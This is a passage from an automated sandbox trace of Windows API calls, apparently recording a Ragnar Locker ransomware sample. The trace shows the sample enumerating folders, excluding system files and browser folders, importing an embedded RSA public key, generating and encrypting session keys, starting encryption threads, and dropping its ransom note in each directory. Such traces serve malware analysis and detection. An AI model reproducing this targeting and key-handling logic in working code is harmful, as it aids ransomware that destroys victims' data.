returned="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf" [0172.920] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1198c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0172.920] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1037\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0172.920] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="LocalizedData.xml" | out: lpString1="LocalizedData.xml") returned="LocalizedData.xml" [0172.920] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned=".xml" [0172.920] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0172.920] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="autorun.inf") returned 1 [0172.920] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="boot.ini") returned 1 [0172.920] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootfont.bin") returned 1 [0172.920] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootsect.bak") returned 1 [0172.920] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr") returned 1 [0172.920] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr.efi") returned 1 [0172.920] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgfw.efi") returned 1 [0172.920] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="desktop.ini") returned 1 [0172.920] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="iconcache.db") returned 1 [0172.920] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntldr") returned -1 [0172.920] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat") returned -1 [0172.920] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat.log") returned -1 [0172.920] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.ini") returned -1 [0172.920] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="thumbs.db") returned -1 [0172.921] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0172.921] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0172.921] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0172.921] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0172.921] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0172.921] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0172.921] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0172.921] GetProcessHeap () returned 0x3520000 [0172.921] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d10050 [0172.923] lstrcpyW (in: lpString1=0x5d10450, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" [0172.923] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0172.923] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1037\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0172.923] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="SetupResources.dll" | out: lpString1="SetupResources.dll") returned="SetupResources.dll" [0172.923] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned=".dll" [0172.923] lstrcmpiW (lpString1="SetupResources.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0172.923] lstrcmpiW (lpString1="SetupResources.dll", lpString2="autorun.inf") returned 1 [0172.923] lstrcmpiW (lpString1="SetupResources.dll", lpString2="boot.ini") returned 1 [0172.923] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootfont.bin") returned 1 [0172.923] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootsect.bak") returned 1 [0172.923] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr") returned 1 [0172.923] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr.efi") returned 1 [0172.923] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgfw.efi") returned 1 [0172.923] lstrcmpiW (lpString1="SetupResources.dll", lpString2="desktop.ini") returned 1 [0172.924] lstrcmpiW (lpString1="SetupResources.dll", lpString2="iconcache.db") returned 1 [0172.924] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntldr") returned 1 [0172.924] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat") returned 1 [0172.924] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat.log") returned 1 [0172.924] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.ini") returned 1 [0172.924] lstrcmpiW (lpString1="SetupResources.dll", lpString2="thumbs.db") returned -1 [0172.924] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0172.924] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0172.924] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0172.924] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0172.924] GetProcessHeap () returned 0x3520000 [0172.924] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x3586870 [0172.924] CryptAcquireContextW (in: phProv=0x3586870, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3586870*=0x3556990) returned 1 [0172.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0172.926] GetProcessHeap () returned 0x3520000 [0172.926] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x358acb0 [0172.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x358acb0, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0172.926] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0172.926] GetProcessHeap () returned 0x3520000 [0172.926] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x35cdc78 [0172.926] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0172.926] GetProcessHeap () returned 0x3520000 [0172.926] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x358acb0 | out: hHeap=0x3520000) returned 1 [0172.926] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x35cdc78, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0172.926] CryptImportPublicKeyInfo (in: hCryptProv=0x3556990, dwCertEncodingType=0x1, pInfo=0x35948f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3594920*, PublicKey.cbData=0x10e, PublicKey.pbData=0x3594928*, PublicKey.cUnusedBits=0x0), phKey=0x3586874 | out: phKey=0x3586874*=0x3547ec0) returned 1 [0172.926] GetProcessHeap () returned 0x3520000 [0172.926] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35cdc78 | out: hHeap=0x3520000) returned 1 [0172.927] LocalFree (hMem=0x35948f0) returned 0x0 [0172.927] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3556330) returned 1 [0172.927] CryptGenRandom (in: hProv=0x3556330, dwLen=0x28, pbBuffer=0x3613354 | out: pbBuffer=0x3613354) returned 1 [0172.927] CryptReleaseContext (hProv=0x3556330, dwFlags=0x0) returned 1 [0172.927] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0172.931] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x3556b28) returned 1 [0172.931] CryptGenRandom (in: hProv=0x3556b28, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0172.931] CryptReleaseContext (hProv=0x3556b28, dwFlags=0x0) returned 1 [0172.931] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0172.935] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x35564c8) returned 1 [0172.936] CryptGenRandom (in: hProv=0x35564c8, dwLen=0x20, pbBuffer=0x361337c | out: pbBuffer=0x361337c) returned 1 [0172.936] CryptReleaseContext (hProv=0x35564c8, dwFlags=0x0) returned 1 [0172.936] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0172.939] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x3556b28) returned 1 [0172.940] CryptGenRandom (in: hProv=0x3556b28, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0172.940] CryptReleaseContext (hProv=0x3556b28, dwFlags=0x0) returned 1 [0172.940] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0172.943] CryptEncrypt (in: hKey=0x3547ec0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0172.944] GetLastError () returned 0x80090016 [0172.944] CryptEncrypt (in: hKey=0x3547ec0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0172.945] GetLastError () returned 0x80090016 [0172.945] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3606430, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0xa8c) returned 0x3b4 [0172.945] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3556330) returned 1 [0173.086] CryptGenRandom (in: hProv=0x3556330, dwLen=0x28, pbBuffer=0x5d1cf74 | out: pbBuffer=0x5d1cf74) returned 1 [0173.086] CryptReleaseContext (hProv=0x3556330, dwFlags=0x0) returned 1 [0173.086] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0173.090] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x3556330) returned 1 [0173.091] CryptGenRandom (in: hProv=0x3556330, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0173.091] CryptReleaseContext (hProv=0x3556330, dwFlags=0x0) returned 1 [0173.091] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0173.094] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x3556330) returned 1 [0173.095] CryptGenRandom (in: hProv=0x3556330, dwLen=0x20, pbBuffer=0x5d1cf9c | out: pbBuffer=0x5d1cf9c) returned 1 [0173.095] CryptReleaseContext (hProv=0x3556330, dwFlags=0x0) returned 1 [0173.095] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0173.098] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x3556330) returned 1 [0173.099] CryptGenRandom (in: hProv=0x3556330, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0173.099] CryptReleaseContext (hProv=0x3556330, dwFlags=0x0) returned 1 [0173.099] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0173.102] CryptEncrypt (in: hKey=0x3547ec0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0173.102] GetLastError () returned 0x80090016 [0173.102] CryptEncrypt (in: hKey=0x3547ec0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0173.103] GetLastError () returned 0x80090016 [0173.103] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d10050, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0xe78) returned 0x3f0 [0173.104] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5cfe0d0*=0x3b4, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0173.458] GetProcessHeap () returned 0x3520000 [0173.459] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3586870 | out: hHeap=0x3520000) returned 1 [0173.459] CloseHandle (hObject=0x3b4) returned 1 [0173.459] GetProcessHeap () returned 0x3520000 [0173.459] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3606430 | out: hHeap=0x3520000) returned 1 [0173.460] CloseHandle (hObject=0x3f0) returned 1 [0173.461] GetProcessHeap () returned 0x3520000 [0173.461] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d10050 | out: hHeap=0x3520000) returned 1 [0173.461] FindClose (in: hFindFile=0x3547c40 | out: hFindFile=0x3547c40) returned 1 [0173.462] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1038", cAlternateFileName="")) returned 1 [0173.462] lstrcmpiW (lpString1="1038", lpString2=".") returned 1 [0173.462] lstrcmpiW (lpString1="1038", lpString2="..") returned 1 [0173.462] lstrcmpiW (lpString1="1038", lpString2="Windows") returned -1 [0173.462] lstrcmpiW (lpString1="1038", lpString2="Windows.old") returned -1 [0173.462] lstrcmpiW (lpString1="1038", lpString2="Tor browser") returned -1 [0173.462] lstrcmpiW (lpString1="1038", lpString2="Internet Explorer") returned -1 [0173.462] lstrcmpiW (lpString1="1038", lpString2="Google") returned -1 [0173.462] lstrcmpiW (lpString1="1038", lpString2="Opera") returned -1 [0173.462] lstrcmpiW (lpString1="1038", lpString2="Opera Software") returned -1 [0173.462] lstrcmpiW (lpString1="1038", lpString2="Mozilla") returned -1 [0173.463] lstrcmpiW (lpString1="1038", lpString2="Mozilla Firefox") returned -1 [0173.463] lstrcmpiW (lpString1="1038", lpString2="$Recycle.Bin") returned 1 [0173.463] lstrcmpiW (lpString1="1038", lpString2="ProgramData") returned -1 [0173.463] lstrcmpiW (lpString1="1038", lpString2="All Users") returned -1 [0173.463] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0173.463] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="1038" | out: lpString1="1038") returned="1038" [0173.463] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1038", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1038\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1038\\" [0173.463] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1038\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1038\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1038\\" [0173.463] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1038\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1038\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\1038\\!$R4GN4R_B8CF767A$!.txt" [0173.463] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\1038\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0173.469] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1038\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1038\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\1038\\*.*" [0173.469] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1038\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0173.469] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0173.469] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0173.469] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x35481c0 [0173.470] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0173.470] FindNextFileW (in: hFindFile=0x35481c0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf4bc93a4, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.471] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0173.471] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0173.472] FindNextFileW (in: hFindFile=0x35481c0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4bc4597, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf4bc4597, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0173.472] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0173.472] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0173.472] FindNextFileW (in: hFindFile=0x35481c0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x109e, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0173.472] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0173.472] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0173.472] FindNextFileW (in: hFindFile=0x35481c0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x151aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0173.472] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0173.472] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0173.472] FindNextFileW (in: hFindFile=0x35481c0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0173.472] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0173.472] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0173.472] FindNextFileW (in: hFindFile=0x35481c0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0173.472] FindClose (in: hFindFile=0x35481c0 | out: hFindFile=0x35481c0) returned 1 [0173.472] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, 